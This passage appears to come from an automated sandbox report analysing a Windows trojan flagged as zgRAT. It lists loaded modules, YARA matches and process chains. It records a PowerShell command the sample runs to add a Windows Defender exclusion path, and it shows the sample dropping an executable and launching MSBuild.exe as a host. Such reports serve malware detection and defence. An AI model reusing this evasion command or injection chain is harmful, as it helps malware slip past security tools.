                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07279F908_2_07279F90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0727DB888_2_0727DB88
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072782888_2_07278288
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0727DB778_2_0727DB77
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0727BAE08_2_0727BAE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0727BAD18_2_0727BAD1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072A2FB08_2_072A2FB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072A9EB88_2_072A9EB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072A7A888_2_072A7A88
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072A42908_2_072A4290
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072AE9008_2_072AE900
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072A00408_2_072A0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072A38E88_2_072A38E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072A8A188_2_072A8A18
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07472EE88_2_07472EE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07476AC08_2_07476AC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_074749008_2_07474900
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0747D9D98_2_0747D9D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07471E488_2_07471E48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07471E588_2_07471E58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07479E388_2_07479E38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07472ED88_2_07472ED8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07472EE78_2_07472EE7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_074712508_2_07471250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_074712608_2_07471260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_074751408_2_07475140
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_074789508_2_07478950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_074748F08_2_074748F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0760B7408_2_0760B740
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_076047208_2_07604720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0760E3388_2_0760E338
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_076090308_2_07609030
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_076030D88_2_076030D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0760D0908_2_0760D090
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0760AE888_2_0760AE88
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07601D808_2_07601D80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07602CC08_2_07602CC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0760EAE88_2_0760EAE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_076004488_2_07600448
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_076030CA8_2_076030CA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07601D708_2_07601D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07602CB08_2_07602CB0
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\gdi32.dll DB4C8F95A46EC357887B98CCA78E3E6257F9EF6E7C965438328AB74A9A43FA8B
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: String function: 6D597C10 appears 33 times
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.000000000344A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUlyssesLiamQuinn.dqH vs 9LrEuTWP8s.exe
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUlyssesLiamQuinn.dqH vs 9LrEuTWP8s.exe
                      Source: 9LrEuTWP8s.exe, 00000001.00000000.1421187680.0000000000F74000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameConsoleApp2.exe8 vs 9LrEuTWP8s.exe
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1530637839.000000000145E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 9LrEuTWP8s.exe
                      Source: 9LrEuTWP8s.exeBinary or memory string: OriginalFilenameConsoleApp2.exe8 vs 9LrEuTWP8s.exe
                      Source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 8.2.MSBuild.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 6.2.uh3ex1.exe.6d5ab000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 6.2.uh3ex1.exe.6d590000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: uh3ex1.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, Strings.csCryptographic APIs: 'CreateDecryptor'
                      Source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, Class4.csCryptographic APIs: 'CreateDecryptor'
                      Source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, Class4.csCryptographic APIs: 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/11@2/3
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9LrEuTWP8s.exe.logJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_podo2qxv.dbg.ps1Jump to behavior
                      Source: 9LrEuTWP8s.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 9LrEuTWP8s.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 9LrEuTWP8s.exeReversingLabs: Detection: 47%
                      Source: unknownProcess created: C:\Users\user\Desktop\9LrEuTWP8s.exe "C:\Users\user\Desktop\9LrEuTWP8s.exe"
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess created: C:\Path1\To2\Save444\uh3ex1.exe "C:\Path1\To2\Save444\uh3ex1.exe"
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444'Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess created: C:\Path1\To2\Save444\uh3ex1.exe "C:\Path1\To2\Save444\uh3ex1.exe" Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeSection loaded: version.dllJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: 9LrEuTWP8s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 9LrEuTWP8s.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: 9LrEuTWP8s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\Users\Bootcherito\source\repos\ConsoleApp2\ConsoleApp2\obj\Release\ConsoleApp2.pdb source: 9LrEuTWP8s.exe

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, Class4.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: uh3ex1.exe.1.dr, -Module-.cs.Net Code: _206D_200F_202A_200F_206D_206F_206D_200D_206C_200B_202E_206A_206B_202A_206C_202B_200D_206A_200B_202E_202B_206D_200C_202A_206D_202B_202A_206C_206E_206E_206B_206C_200B_200E_206D_200D_206D_202C_200E_200C_202E System.Reflection.Assembly.Load(byte[])
                      Source: 9LrEuTWP8s.exeStatic PE information: 0xCBA514CB [Thu Apr 7 21:46:51 2078 UTC]
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D5A2DE4 push ecx; ret 6_2_6D5A2DF7
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC20CF push esp; iretd 6_2_00FC20D7
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC34B0 push edx; iretd 6_2_00FC34FE
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC1C31 push ecx; iretd 6_2_00FC1C33
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC1C07 push edx; iretd 6_2_00FC1C0F
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_00FC11EF push ds; iretd 6_2_00FC11F0
